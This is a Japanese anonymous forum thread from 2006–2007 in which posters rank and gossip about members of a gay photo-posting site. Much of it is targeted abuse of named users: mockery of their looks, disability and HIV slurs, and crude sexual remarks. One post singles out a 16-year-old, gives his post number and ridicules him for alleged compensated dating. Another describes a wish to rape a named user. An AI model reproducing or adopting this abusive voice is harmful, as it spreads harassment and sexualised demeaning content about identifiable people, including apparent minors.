http://shamail.ko-mens.tv/j-pm/view.cgi/166892.ピクチャ(jpg)022?f=166892.ピクチャ(jpg)022&a=a-&x=1167297884
http://shamail.ko-mens.tv/j-pm/view.cgi/166892.jpg?f=166892.jpg&x=1167297884
ジョシュ坊がKOにフレボの写メで出没よ。てかジョシュ兄もゲイだったのね。

98 :禁断の名無しさん:2006/12/28(木) 18:43:32 ID:IoVA/lAk
あれ?>95とIDが同じだわ!?こんな事ってありえんのかしら?

99 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/28(木) 21:34:44 ID:/jnsz8Jl
皆様、ご機嫌麗しゅう
>>95
やはりカズキ様はバイなんですか!お仲間ですわ〜〜
カズキ様のことだから男女共にそれはそれはスゴそうですわね…

>>97>>98
御兄弟揃ってゲイとは驚きですわ、お顔も瓜二つですし。
 
貴方、95様なのでは?もし違うとしたら2ch創立以来のスゴイ事ですわねw




100 :禁断の名無しさん:2006/12/29(金) 00:43:27 ID:1gQFtdt2
>98
今までも何度かそういうことあったみたいだよ。まぁ喜んどきな。

101 :バカなゲイ?:2006/12/29(金) 13:09:42 ID:2i6Z9nHg
君達二人は、沢山の人を巻き込み、沢山の人の気持ちを裏切り、彼女は年上の男の気持ちを裏切り、彼も年上の男の気持ちを裏切り、今、裏切られた二人の気持ちも忘れ何かを獲ようと必死にもがいていますね。
人の気持ちを利用したあなた方二人は何を獲る事が出来るかな・・・

失うものは沢山の人の信用であり、決して君達二人は愛を得る事はありません。
あなた方二人の周りで振り回された人の気持ちを考えてみて下さい。
俺はこれから先、あなた方二人に降りかかってくる、(あなた方二人が天に向かって吐いた唾)を黙ってみさせていただきます。
それをみるのは、俺と同じ思いで苦しんだ、もう一人の裏切られた方へ対する俺の罪亡ぼしであるから

それともあなた方二人は俺達二人の前から逃げるかな
君へ
君は此処を観ていないと言っていましたね。
その言葉だけは今でも信じています。
俺は何も企んでいません。すべて君達二人と俺が招いた事態です。
それを忘れずに・・・

102 :姫君:2006/12/30(土) 02:11:21 ID:1yJB9QpS
マリー様 私も芸能人のある方に似てると良く言われますの。二人でドラマに出ましょう!アキバ系と…

103 :禁断の名無しさん:2006/12/30(土) 13:57:12 ID:5oI4EUA8
http://love4.2ch.net/test/read.cgi/gay/1158681650/

104 :禁断の名無しさん:2006/12/30(土) 23:18:27 ID:A7lqcoi2
今年最後のベスボ
アレが一位か
がっかりだな
上位三人終わってるな
もう来年からベスボもこのスレもなくなった方がいいみたい

105 :禁断の名無しさん:2006/12/30(土) 23:55:33 ID:4XqV2Wr0
マリー君なら一位になれたのに

106 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/31(日) 00:21:45 ID:HCEio0ac
皆様、ご機嫌麗しゅう
ちょっとぉ〜〜なんで今回もたいが様消えてらっしゃるの!?
もーホント残念!!あのまま居たらグラフィティ確実だったのに…
いいですわ、次投稿なされた時喝入れてやります。

>>102
アキバ系のドラマなんてイヤですわ〜〜
どうせなら悲恋ものがいいです。
…芸能人の誰に似てらっしゃるの?なんか姫君様って相当イケメンな気がする…

>>104
>もう来年からベスボもこのスレもなくなった方がいいみたい
そんな事ダメですわ!!老舗スレをなくすなんて考えられません。

>>105
そのようですわねw
でも、今はお肌が荒れててダメですわw



107 :禁断の名無しさん:2006/12/31(日) 15:25:43 ID:5jxoKi7t
最近の管理人は何が何でもみんちを1位にはしないのねw
管理人にまで嫌われるみんち哀れw

108 :禁断の名無しさん:2006/12/31(日) 15:50:56 ID:3VWh/D7u
ミンチ小動物みたいでカワイイけどイケメンといわれれば否定するわね〜

109 :禁断の名無しさん:2006/12/31(日) 18:12:18 ID:8uCTrQIR
身長180の小動物は作為的な不正投票で押し上げられた一位だからね。


110 :禁断の名無しさん:2006/12/31(日) 20:20:18 ID:CHHuzzRg
2007年はイケメンもブサイクもガンガン投稿してベスボとこのスレをアゲアゲで

111 :*マリー=アントワネット* ◆.GOOduZGng :2006/12/31(日) 22:22:56 ID:hyIUgyAr
皆様、ご機嫌麗しゅう
今日は大晦日ですわね!皆様いかが過ごされてるのかしら?
さ〜今年もジャニーズのカウントダウンライブを確と見届けなくてわ。
可愛いジュニアの子達たくさん出てこなかしら…?
あと最強運芸能人決定戦も見逃せませんわ。

>>110
そうですわ!ベスボ&ベスボスレは未来永劫アゲアゲですのよ!!

2007年は五行でいうと土の気が強まる一年になるらしいので(土は金を生じる)、
南西か西?にオレンジか金色の物を置くと金運アップにつながりますわよ。




112 :z:2007/01/01(月) 00:58:01 ID:qC24tunE
新しいアイドル
発見!審!
可愛い!

113 :禁断の名無しさん:2007/01/01(月) 13:57:33 ID:gDFz1l4s
たくまってブスがKOに載せてたけどアイツ17才だったのね。
たくまといい力也といいガキはルールも守れないから嫌いだわ。

114 :*マリー=アントワネット* ◆.GOOduZGng :2007/01/01(月) 16:41:50 ID:fYlcddNL
皆様、あけましておめでとうございます
今年もこのマリー=アントワネットをどうか宜しくお願いします

今年の抱負は…絶対に内定を頂くことですわ!
はぁ…来年はもう社会人ですわよ

>>113
えぇ〜〜っ!!たくま様って17歳なんですの!?
とてもあのお顔からは・・・



115 :*マリー=アントワネット* ◆.GOOduZGng :2007/01/01(月) 18:06:56 ID:z8Y+xxrz
わたくし、髭坊主様イケますわ…

116 :禁断の名無しさん:2007/01/02(火) 11:04:42 ID:aUCaPQby
ケンGOって40近いでしょ…。

117 :禁断の名無しさん:2007/01/02(火) 13:04:33 ID:gS/RthGp
ケンGOは28らしいよ。ちと老けて見えるよね。

118 :禁断の名無しさん:2007/01/02(火) 13:23:06 ID:9m4dCHRq
やばい…髭坊主めちゃめちゃカッコイイ
誰か髭坊主のことについて知らない?

119 :禁断の名無しさん:2007/01/02(火) 19:05:13 ID:Ax9Ab7/g
>>118
俺もヒゲ坊主君タイプ

120 :禁断の名無しさん:2007/01/03(水) 01:04:04 ID:7By8ECUh
髭坊主って奴横顔はかわいいが正面見ない限り何とも言えない

121 :禁断の名無しさん:2007/01/03(水) 02:12:24 ID:53bOjPrK
個人的にはH2みたいなアッサリ系が好きだけど、何か物足りなくてゲイ受けしなさそう。

122 :禁断の名無しさん:2007/01/03(水) 03:40:33 ID:IdSWPxqV
>>121
わかる気がするぅ!俺もアッサリやゲイに見えないヤツのがスキなんやけど、そぉゆぅヤツってあんまモテないんよね。ゲイ友とかにゆっても『ドコがイイん?』とか聞かれるよ…。

123 :禁断の名無しさん:2007/01/03(水) 06:27:38 ID:0cEo2OPH
H2はあっさりとかを飛び越えて人間離れしてる顔だから…。

124 :禁断の名無しさん:2007/01/03(水) 06:53:45 ID:53bOjPrK
ま、好みは皆様それぞれなので。
ちなみにたくまが復活してる件。

125 :禁断の名無しさん:2007/01/03(水) 23:54:34 ID:L1ESDKeJ
>>123
普通に不細工よね?w

126 :禁断の名無しさん:2007/01/04(木) 02:12:38 ID:w3QAy23D
人の好みはよくわかんないから、H2格好いいと言うヤツがいても変ではない。
が、世間一般的な常識では不細工な方だと思う…。
好きなヤツ、競争率が低くて良かったな。

127 :禁断の名無しさん:2007/01/04(木) 03:46:39 ID:0jPhzj43
「不細工な方」とかじゃなくて不細工なのよ?w

128 :禁断の名無しさん:2007/01/04(木) 03:50:01 ID:2QD+Ak6m
0021056306かも・・・
55888130だ


129 :禁断の名無しさん:2007/01/04(木) 03:52:49 ID:w3QAy23D
>>127
うん。俺の中ではかなり不細工な部類。
いちよ好きなヤツがいるかもだから配慮してみたWw

130 :禁断の名無しさん:2007/01/04(木) 04:00:45 ID:2QD+Ak6m
どのみち56306なら55216ものたちをつきだしてやる

131 :禁断の名無しさん:2007/01/04(木) 04:12:10 ID:zW4YrjeM
>>130 落ち着いて下さい。大丈夫ですよ。


132 :禁断の名無しさん:2007/01/04(木) 04:17:06 ID:2QD+Ak6m
だらだらしていないで50730はやくしょりしろ

133 :禁断の名無しさん:2007/01/04(木) 04:24:53 ID:2QD+Ak6m
131
はやくなんとかしろ

134 :禁断の名無しさん:2007/01/04(木) 04:27:44 ID:8L/XuEwD
>>129を除く、>>128-133
意味が解んねえわ?

135 :禁断の名無しさん:2007/01/04(木) 04:27:45 ID:2QD+Ak6m
131
なにもできないならおちつけとかだいじょうぶだとかいうな

136 :禁断の名無しさん:2007/01/04(木) 04:27:56 ID:w3QAy23D
イミわかんないよぉ〜。どしたの!?

137 :禁断の名無しさん:2007/01/04(木) 04:33:23 ID:2QD+Ak6m
うそつきどもめとしあけるまでにはしょりしますとかいってたくせに


138 :禁断の名無しさん:2007/01/04(木) 04:36:07 ID:8L/XuEwD
>>137
何処の宇宙人と交信してんの?

139 :禁断の名無しさん:2007/01/04(木) 04:37:55 ID:w3QAy23D
>>137は有限実行されなかった事に怒ってるのかな?

140 :禁断の名無しさん:2007/01/04(木) 04:41:46 ID:2QD+Ak6m
これでわかりましたか?

141 :禁断の名無しさん:2007/01/04(木) 04:44:34 ID:w3QAy23D
なんとなくはわかったけど具体的にはさっぱりだよ…なんでハッキリ書かないのかなぁ?誰かに配慮してるの?

142 :禁断の名無しさん:2007/01/04(木) 04:57:46 ID:zW4YrjeM
>>140
わかりました。

>>141
ハッキリ書きましょうか!これはFOMAカード入れ換え実験です。

143 :禁断の名無しさん:2007/01/04(木) 05:01:23 ID:w3QAy23D
>>142
そなの?機械関係イマイチ弱くて…。
教えてくれてありがとな。

144 :禁断の名無しさん:2007/01/04(木) 05:06:13 ID:2QD+Ak6m
>>143
これはなりすまし暴きです。
FOMAカードを入れ換えるとIDが変わるのです!


145 :禁断の名無しさん:2007/01/04(木) 05:09:49 ID:w3QAy23D
>>144
ありがとぉ…。
なんか簡単にだまされる自分が悲しくなってきた。
もぉちょっと知識つけなきゃなぁ…。

146 :tsrys:2007/01/04(木) 05:21:17 ID:2QD+Ak6m
ここをみて苦しんでいる皆様へのプレゼントです。
皆様こんなスレに騙されちゃいけないですよ!

00はこの手を使ってここにカキコしている外道なキチガイ共に何度かカマをかけました!

皆さん少人数のキチガイ共に負けないでくださいね! SR

147 :禁断の名無しさん:2007/01/04(木) 05:55:21 ID:2QD+Ak6m
>>145
あまり気になさらずに!
俺は○TTで働いていたから知っていただけです。
これは一般方が使える一番簡単な方法です。
悪戯が酷くなるようなら、俺が他の方法も全部書き上げます!

148 :禁断の名無しさん:2007/01/04(木) 17:25:05 ID:19VoiqLF
こんばんわ〜〜〜〜!!皆様!!
そうそう、何時かわたくしが、ここで倖はなしをしたの覚えてらっしゃるかしら?
名前は忘れましたが・・・円光の神様がいると。
その方、KOシャメ掲示板に登場ですわよ!!
山陰の16歳ですわ!!記事番号は、169365ですわ!!
ブスが必死でカキコしてるのが笑えるわwwww
HIVの病巣の癖して!
彼の学校、道徳や、校則、そういったものは存在しないのかしら?
若干中学時代から男漁りに余念がないですが・・・汗
親も親、学校も学校、地域住民が命をかけて守っていかなくてはならない、将来を担う、日本の光ですわよ!!
それを、男漁りばかりさせておいて・・・。
皆様、愛の手を!!(^o^)/~~

149 :禁断の名無しさん:2007/01/04(木) 17:43:19 ID:19VoiqLF
>>148
わたくしとしたことが、誤変換をしてしまいました。
まことに申し訳ございません。
訂正箇所は以下のようになっています。文章二段目の
(誤)→そうそう、何時かわたくしが、ここで倖はなしをしたの覚えてらっしゃるかしら?
(正)→ここでこう話を
ですわ。大変失礼いたしました。

皆様、最近書き込みが少ないですわよ!!
もっと書き込んで、ベスボともに盛り上げていきまっしょい(^。^)b

150 :禁断の名無しさん:2007/01/04(木) 17:55:25 ID:19VoiqLF
近頃、フレボを拝見させていただいています。
フレボコーナーは、相変わらず、グロ画像の倉庫ですわね。ベスボ以上に・・・
近い将来のベスボにならないことを祈っています。

さて、フレボに投稿なされていらっしゃいます'龍&効'様、とっても、みるに耐えないものを晒さないでくださいまし。
なんだか、形容しがたい気持ち悪さですわ。左の片方の方、魔女のような鼻ですわね・・・。
垂れ下がった鷲鼻がとんがっていて、黒魔術で、嫉妬しているベスボメンバーを呪い殺さないくださいね。
あたくしのお気に入りの子達がもう、見れなくなってしまうと思うと・・・
それはそれは胸を針で刺されているような気持ちになってしまいます。。。

ベスボのセイジ様、はじめまして。
あなたお年おいくつ?フレボに年齢制限が設けられていること、御存知かしら?
中年が投稿するサイトではありませんよ。ましてや老け専なんて・・
あなたのお顔を拝見するときは、いつも眉間にしわ・・・何故でしょう?
昔、MEGARYU様というお方がいたの御存知かしら?
彼も眉間に皺がひどかったのですが、あるとき、顔の筋肉の神経が死んだのでしょうね・・・
肉が垂れ下がり、顔が変形し、顔面麻痺になってしまいました。
あなたもMEGARYU様の二の舞にならないことを切に願うばかりではなく、そのためにも、
ベスボを卒業されてはいかがです?

151 :禁断の名無しさん:2007/01/05(金) 06:04:03 ID:8crmMxZ0
なんかアピボにカズキが女はべらしたハーレム写メのせてんだけど…ヤツは何がしたいんだ!?

152 :禁断の名無しさん:2007/01/05(金) 06:19:59 ID:3EzbRBVN
たくまがキモすぎる件。
規約違反の分際で何様だあのブス。

153 :禁断の名無しさん:2007/01/05(金) 06:38:45 ID:4MsGnpgr
>>151
別にカズキ好きじゃないし、どっちかって言えば嫌いな方だけど
あんなのでハーレム呼ばわりなんて、あなた女友達いないの?

>>152
見てきたわ。ホントにきもいわねw
ベスボはガキや周りに頼るしか能のない奴が多いとか言ってるけど
セッタの最後のアピボ投稿のまんまパクリでびっくりしたわw
捨て台詞吐いて去るのがかっこいいとでも思ってるんでしょうけど
そんなことやってる時点で十分立派にガキじゃない。しょせんガキはガキだわw

セッタにしろたくまにしろ、これまで投稿も感想書き込みも散々してた奴が
唐突にサイトの住人を批判してもかっこわるいだけで全く説得力ないのよね。
結局嫌なことがあったから悔しまぎれに喚いてるようにしか見えないw

154 :禁断の名無しさん:2007/01/05(金) 06:47:31 ID:4MsGnpgr
たくまのアピボに気を取られて気付かなかったけど英ノ助復活してたのね。
昔好きだったけどあんなにしゃくれてたかしら?w
今となっては何が良いと思ってたのか謎だわ。
そういえば彼もバナプロの一員だったわねw
懐かしいわ、バナプロw

155 :禁断の名無しさん:2007/01/05(金) 09:21:24 ID:KL/abVJK
皆様、最近私、思うんですの。
このスレ、とってもsage進行だなって。
もう少しage進行でいきませんか?
昔のように・・・
書き込みがまだ少ないですわね・・・。
皆様、もっともっと盛り上げていきまっしょい^^(;゚ー゚)/オー!!

156 :禁断の名無しさん:2007/01/05(金) 10:37:30 ID:JHoRvk9o
審くん、ひさびさにヒットするコだとおもた。
あの顔に濃いのたっぷりぶっかけてぇ〜
んで、きれいに舐め取ってもらいてぇ〜

157 :禁断の名無しさん:2007/01/05(金) 17:45:30 ID:4MsGnpgr
>>155
何か勘違いしてるみたいね。あなた2ちゃん初心者かしら?
見れば分かると思うけどこのスレでsageてる人なんか皆無よ?w
書き込む前にageとsageの勉強から始めたらどうかしら?

158 :禁断の名無しさん:2007/01/05(金) 18:04:06 ID:KL/abVJK
こんばんわ。
157サンお返事ありがとうございます。
そうですね。わたくし、2チャンネル初心者です。
わたくし、2チャンという言葉を聞いて真っ先に創造したのがテレビ局でした。
もちろん、2チャンネルはテレビ局のことではなかったんですが・・・
とりあえず、アゲサゲの勉強からはじめたいと思います。
皆さん本当に詳しい方ばかりで、いつも勉強させてもらっている次第です。
これからも、皆さんからえるものはえていきたいと思っています。
よろしくおねがいします。

あと、わたくしからいえることは唯一つ。
皆さん!!もっと書き込みましょう!!

159 :禁断の名無しさん:2007/01/05(金) 20:13:50 ID:E6WSczIh
>>152今見に行ったら消えてた。どんな内容だったのかしら?

160 :禁断の名無しさん:2007/01/05(金) 20:29:54 ID:26PubclX
カ ズ キ キ モ イ

161 :禁断の名無しさん:2007/01/05(金) 20:43:17 ID:4MsGnpgr
>>159
もう嫌気がさした。ありえない。
いい年してまだあんなガキくさいことをする奴がいるなんて…。
ガキっぽい奴や誰かに頼るしか能のない奴がここには多すぎる。
俺が言いたいのはそれだけ。
お疲れ様でした。
さようなら。

みたいな感じだったわ。
嫌がらせした相手にキレる分にはまだいいんだけど
ついでみたいにサイトの投稿者達にまでキレてるのが意味分かんないわよねw

162 :禁断の名無しさん:2007/01/05(金) 21:50:18 ID:E6WSczIh
>>161そうなの?
直接本人に言えばいいのにね。わざわざアピボに書かなくても。本人の印象悪くしてるってわかんないのかしらね。

163 :禁断の名無しさん:2007/01/06(土) 07:13:39 ID:1lZKEaYP
ヒロとか審って無理だな
あんなんが上位をしめるようになったらベスボもこのスレも語る事はなくなるな


164 :禁断の名無しさん:2007/01/07(日) 07:16:28 ID:VI8bs5dt
更新されたけど新着ないね。

165 :禁断の名無しさん:2007/01/07(日) 11:55:11 ID:ivErn+K2
ダッペ、カッコイイ

166 :禁断の名無しさん:2007/01/07(日) 20:02:44 ID:5A7xslzU
聡様がかっこよろしい

167 :禁断の名無しさん:2007/01/07(日) 23:14:15 ID:TplknRh7
パーラメントを一位にしてきますた。

168 :禁断の名無しさん:2007/01/07(日) 23:22:22 ID:TsuqqWWe
ベスボ陥落。
つまんなくなったな。

169 :禁断の名無しさん:2007/01/07(日) 23:37:40 ID:kZqDzbNB
ってか、ベスボで一位になっても、なんも嬉しく 無いと思う

170 :禁断の名無しさん:2007/01/08(月) 12:47:14 ID:iHAqwSYX
>>166
歯並び悪そう。

>>169
急に何?誰もそんな話してなくない?

てか誰か不細工H2の引退に触れてやれよw
引退ってw

171 :禁断の名無しさん:2007/01/08(月) 18:36:47 ID:TYMmkhDO
こんばんわ。皆様。
H2様、引退なされるんですの????
寂しいですわ・・ヽ(´Д`)ノ
H2様、一度でいいからレイプしたいと思っていました。
この時期寒いですからね。
部屋に暖房をがんがんにつけて、彼のファッションのまま・・・
これ以上はいえませんわ。わたくし、彼の食べ方はこれが一番ベストだと考えていますの。
服から体温を感じ、少しづつ、体をあらわにしていくH2様。赴き深いですわね。
嗚呼、なんとしてでも、貴方様を食べたい・・・
H2様がもし私のこのコメントを見ておられるのなら、ぜひ、わたくしめをラブホテルに連れて行ってくださいまし。
その時は、わたくし、H2様を一生の限り、ラストエンペラーとして、崇拝させていただきます。

172 :禁断の名無しさん:2007/01/09(火) 00:12:23 ID:6yeReFOy
>>169
先週1位のヒゲ坊主が思いっきり喜んでるわよw

それはともかくヒゲ坊主って正面からの顔は大した事なさそうだわ。
本人もそれが分かってるからしつこく横顔で投稿してるんじゃないかしら。

それからカズキはだんだん不細工になっていくわねw
初登場の頃の輝きが全く感じられなくなってる。

173 :*マリー=アントワネット* ◆.GOOduZGng :2007/01/09(火) 01:25:31 ID:D8YCuYFw
皆様、ご機嫌麗しゅう、わたくしが居なくてもスレが伸びていて実に素晴らしいです。
お正月はいかが過ごされましたか?わたくしは期末試験&某資格の勉強をしていました。
もちろん筋トレもしてますわ!w
ここ数ヶ月で胸筋がピクピク動かせるようになりましたの。

>>118>>119
やはりそう思いますわよね!
彼はただカッコイイだけでなくて人相も良い気がしますわ。
額は広くて聡明そうですし、鼻筋からは立派なイチモツをお持ちだと考えられます。
口もやや厚みがあり大きくて生活力がありそう。

>>121
H2様で物足りないんですか!?
ならばわたくしの方がゲイ受けヨロシクないかもしれませんわw
二丁目でナンパしてきたおじ様に「君、この街に似つかわしくないね」と言われましたから(短髪・髭有りの時)。

>>123>>127
H2様は不細工ではないですわよ?アナタ方、本当の醜顔というのを御存知でないようですわね。
あっ言っときますがわたくしはタイプではないですので。

>>150
わたくしもセイジ様の御歳が気になりますわ。
いい感じに脂がのったツヤツヤなお肌に目がいきます。

>>157
あら、アゲサゲなんて大して気にしてませんわよ?w
…わたくしも最初2ちゃんねるって何処ぞのテレビ局かと思いましたわw
またいらしてね(;゚ー゚)

・・・たくま様といいセッタ様といい、最近ご乱心なのかしら?
















174 :*マリー=アントワネット* ◆.GOOduZGng :2007/01/09(火) 01:51:11 ID:D8YCuYFw
>>167
パーラメント?様ってシャープな目元が印象ですわ。
結構好きかもw
>>168
今こそバナプロならぬ、マリプロ(マリー=プロジェクト※ハロプロを意識してる)の発動ですわ!
まあわたくしの出る幕はありませんがw
ちなみにマリプロのメンバーは・・・
m!nch様、TOSHI-ROW様、TAK様、猪猿様、タクヤ様
そしてわたくし!未だその姿は闇に包まれた哀しき目をもつマリーですわ!!

>>171
ダメですわ、レイプだなんてそのような荒々しい行為は。
わたくしがもしそのような事を受けたらショックで立ち直れませんわ。

>>172
ほら、諸行無常・盛者必衰の理のあらわれですわ。








175 :姫君:2007/01/09(火) 02:20:22 ID:ch9toSOt
マリー殿 私と二人で歌いましょう。私はボーカル、あなたはダンス。マリー殿もわざわざあの寂れた2丁目に行くとは暇人ですわね。私がもっと激しくもっとイケメン揃いな所を教えてあげますわ

176 :禁断の名無しさん:2007/01/09(火) 03:03:51 ID:/dmGZw5L
なんか最近晴哉ぶさいくになってきた…かなり好きな顔だったのに。もうダメだな。他のヤツ応援しよ。

177 :禁断の名無しさん:2007/01/09(火) 12:02:53 ID:/Ctbgfz9
髭坊主がカズキにちょっかい出してそれにカズキも答えてる
カズキ姉さん、久々に疼き出したのかしら
素敵な関係になってフレボに出て欲しい

178 :禁断の名無しさん:2007/01/09(火) 20:19:41 ID:WTJFog1u
>>176
笑わせないでちょうだい!!
晴哉はもともと不細工よ。あたかも前はイケメンだったかのような書き込みは止めてくださらない?
あと、H2はブスよ。
障害者みたいな顔じゃない。ヘラヘラして、知能障害かしら???
H2は目隠ししたら、ウンコも食べると思いますわ。

179 :禁断の名無しさん:2007/01/10(水) 04:24:46 ID:IYuSUfn+
晴哉は角度によって見れる顔になる。基本的にはぶさいくなのかもだけど、俺にはなんかツボだったんだよ。…趣味悪ぃかな。

180 :禁断の名無しさん:2007/01/10(水) 12:05:14 ID:36QGnk2C
カズキが都会に進出よ
大丈夫かしら

181 :禁断の名無しさん:2007/01/10(水) 15:29:06 ID:+1rKCfD8
ヤリマンカズキの事だから大阪行きでマンコウズウズしてるんじゃない?
そりゃ取っ替え引っ替え喰いまくるわね。今よりガバガバになるわ
飽きっぽいのあの子

182 :禁断の名無しさん:2007/01/10(水) 21:42:40 ID:6AEsvmv8
今気づいたわ!!
顔面麻痺の代名詞、MEGARYU様がアピボに投稿なされていますわ!!

>>181
病気もらって帰ってくると思うわね。
その時は、あたくし、KAZUKI様を死ぬまで看病するつもりでございます。

>>180
KAZUKI様は大丈夫よ。大阪だけに食い倒れるんじゃないかしら?

皆様、もっとしっかり書き込みをしてくださいまし。
盛り上がり方がいまいちですわよ。
昔のようにブチアゲでアゲていきましょ。

183 :禁断の名無しさん:2007/01/10(水) 22:41:50 ID:6AEsvmv8
そうそう、ベストグラフィティー見たら、凄いことになってたわ。
ブスが上から2連続で投稿されてたの。
ジョシュアの時も、恐ろしいものがあったんだけど悪夢再びといった感じね。
みなきゃよかったわ。正直。
ベスボもベスボだけど、閲覧者も閲覧者よね。
もっとましなメンズに投票したらいいのに、どうしてあんなのに票入れるかねぇ・・・
あの顔で、ベストグラフィティーに飾られて、恥ずかしくないのかしら?
世間に恥晒して喜んでるんだからおめでたいやつらよね。

184 :禁断の名無しさん:2007/01/10(水) 23:09:39 ID:rG/aVq09
>>183
こーゆーのって見た目良い奴が言ってたら説得力あるんだけど…。
メンズとか言っちゃってる時点でお里が知れるってもんだわ。
どうせ頭が弱い倖田來未ファンのベスボ投稿者なんでしょw
自分が上位に行けないからってこんなとこで負け惜しみはみっともないわよw

185 :禁断の名無しさん:2007/01/10(水) 23:37:07 ID:zYviTMMv
マリーさんおもしろい。

186 :禁断の名無しさん:2007/01/11(木) 01:33:46 ID:JyFUS0B0
マリーか?名前なくね?姫とかじゃなくて?

187 :禁断の名無しさん:2007/01/12(金) 01:46:34 ID:DOnAzDoy
俺のマリィは素晴らしいぜ!もっと毒舌を(笑)なんなら顔も曝してやれよ。美形なんだから問題ねぇだろ?

188 :禁断の名無しさん:2007/01/12(金) 02:10:07 ID:8hggu01g
今度マリー・アントワネット映画でやりますよ。

189 :禁断の名無しさん:2007/01/12(金) 02:48:54 ID:DOnAzDoy
やるねぇ♪ちょっと見たいかも〜とか思ったんやけど、一緒に行きたいヤツいねぇし!なんなら一緒行く?笑

190 :禁断の名無しさん:2007/01/12(金) 21:55:57 ID:WsSm4+A2
投稿してます。

あーそういう事だったんだー

191 :禁断の名無しさん:2007/01/13(土) 00:12:43 ID:7AATFoOi
法眼ってどうよ?

192 :姫君:2007/01/13(土) 00:46:51 ID:nihl+kKR
DO様!素敵じゃの!一度で良いから唇に触れてみたいの。マリー殿、わらわはDO様にチギリを捧げまする。早く城から出て行くが良い。

193 :禁断の名無しさん:2007/01/13(土) 09:01:15 ID:B3lUmxNJ
ここ初めて覗いたけど、書き込んでる人ってみなさん揃って心も顔も“ブス”なんでしょうね。他人の悪口書き込んで喜んでるなんて…。精神病みすぎてる。。

194 :禁断の名無しさん:2007/01/13(土) 12:09:21 ID:T5bI6N9t
JUMPさんてカッコいいと思わないし好きにはなれないけどじっとみたくなる顔

195 :姫君:2007/01/13(土) 12:21:01 ID:nihl+kKR
>>193
綺麗な薔薇には毒があるもの。綺麗な心の裏には誰にも解らぬ闇がありまする。ここはその闇を吐き出すところ。そなたの様に純粋な心を持つものには解らぬであろうな。

196 :禁断の名無しさん:2007/01/14(日) 01:06:27 ID:DomqId9Q
JUMP消しやがった!一位になれなかったからって消すヤツどうよ?

197 :禁断の名無しさん:2007/01/14(日) 01:18:13 ID:DomqId9Q
ってか、最近ブサの投稿が多すぎる!自分でイケてると思ってんのかな?ナルが多いんだよ…orz

198 :禁断の名無しさん:2007/01/14(日) 01:47:22 ID:Yyj+m3ca
載せることが恥ずかしいーってぐらい、サイトの価値が下がったのかな?

199 :禁断の名無しさん:2007/01/14(日) 01:48:54 ID:DomqId9Q
下がりまくってるよな。ホントのイケメンはドコで生息してんだか?

200 :禁断の名無しさん:2007/01/14(日) 02:11:11 ID:covyNkP+
てかJumpって一日で100票近く入ってたから他の誰より凄いのに…
消しやがった…
今のメンツでいっせいにスタートしてたら断トツ一位だったのに、一日で一位は取りたかったんだねw
かわいかったのに…
ま、俺はタイプだった。

201 :禁断の名無しさん:2007/01/14(日) 02:45:37 ID:DomqId9Q
俺もカナリ可愛いと思ってただけに残念…。
ぶっちぎりで可愛かったのにな…。マジなんで消すんだよ!って納得いかねぇし!

202 :禁断の名無しさん:2007/01/14(日) 02:47:01 ID:covyNkP+
やったー!
Jumpからメールが、キタコレ!
16歳だってよ、歳偽ってんのが怖くなったんだってw


203 :禁断の名無しさん:2007/01/14(日) 02:49:32 ID:DomqId9Q
可愛かったハズだ…。
まぁバレなきゃイイんじゃね?

204 :禁断の名無しさん:2007/01/14(日) 03:03:11 ID:covyNkP+
応援ありがとうございました、芸能人になったみたいで楽しかったです!
ってメールが来た。
ガキだからポケモンの話題が出るわけかw

サブアドだったんだけどデートしてって返信したら宛先不明で返ってキタコレ…w

205 :禁断の名無しさん:2007/01/14(日) 03:14:14 ID:DomqId9Q
普通にハタチかなりすぎてりゃ、“ポケモン何ソレ?”んなるわな。
ってか、二度目が繋がらないってどゆコトよ?
拒否られたか?

206 :禁断の名無しさん:2007/01/14(日) 05:27:40 ID:zuEZE/XS
大橋 山っち JUMPは悪用じゃない?あれノンケだし

207 :禁断の名無しさん:2007/01/14(日) 10:21:44 ID:h3YTBUtF
JUMPの部屋から記念パピコ

208 :禁断の名無しさん:2007/01/14(日) 10:51:44 ID:covyNkP+
まじかよ?なんだ俺遊ばれてたのかw

209 :禁断の名無しさん:2007/01/14(日) 14:12:13 ID:DomqId9Q
でも返事くれたんだから良かったんじゃね?ホントに遊ばれてたら返事もくれないよ。

210 :禁断の名無しさん:2007/01/14(日) 16:35:38 ID:qYyDeMUO
ヒゲ坊主の正面(横顔)がイマイチだった〜

211 :禁断の名無しさん:2007/01/14(日) 16:52:55 ID:Yyj+m3ca
水着の子、かわいくない?

212 :禁断の名無しさん:2007/01/14(日) 19:34:31 ID:YB/82QFT
悪用だろ?絶対に来週はいないよ。

213 :禁断の名無しさん:2007/01/15(月) 00:43:18 ID:Mj9xqNLn
猪猿カッコイイ〜

214 :禁断の名無しさん:2007/01/15(月) 02:46:15 ID:OrXo6knu
ヒデユキって人まだ20才だったの?

215 :禁断の名無しさん:2007/01/15(月) 17:11:59 ID:0mjtQU3f
大橋、歩、山っちは悪用だな
他にもいたりしてw

216 :禁断の名無しさん:2007/01/15(月) 17:38:02 ID:RHY5cOZe
なんとか坊ってのも、ちゃっかり復活してやがんな。

217 :禁断の名無しさん:2007/01/15(月) 17:56:17 ID:XSf2N4YU
hiro毎回否定的なコメント書かれてよく投稿出来るよね

218 :禁断の名無しさん:2007/01/15(月) 18:03:38 ID:0oKVRDT7
吹き出物妖怪にワロタw

219 :禁断の名無しさん:2007/01/15(月) 18:27:00 ID:LZucHbUI
J坊って痛すぎ。言い訳も。
プロにメイク&撮影ですかそーですか。どうみても自分撮りw

220 :禁断の名無しさん:2007/01/15(月) 21:44:56 ID:RHY5cOZe
言い訳の痛さに気付いて投稿コメント修正だし。

221 :禁断の名無しさん:2007/01/16(火) 07:36:08 ID:u30U1PBM
しっつにカズキがコメント書いてるし。円満に別れられたのかなぁ?カズキの神経が不思議で仕方ない。

222 :禁断の名無しさん:2007/01/16(火) 10:06:08 ID:z38X67Te
ajって人なんかあったのか?

223 :禁断の名無しさん:2007/01/16(火) 12:12:19 ID:g0WED1NQ
ajはジョシュ坊と何らかの関係があって
当のジョシュ坊が叩かれたから
ショックを受けてるのでは?

予想に過ぎんがな。

224 :禁断の名無しさん:2007/01/16(火) 17:10:33 ID:7WkU/a6P
髭猿がブサになって降臨しまつた
なんであの画像なんだろう

225 :禁断の名無しさん:2007/01/16(火) 21:43:17 ID:VXlrJuhM
フレボでJ坊とajのコラボ見たんだけど、右上の写真の人ってちょっと前に投稿してたRYO(確か)って人じゃない?
よく見りゃ顔似てるしajと同一人物なんかな?てかajって芸能人?

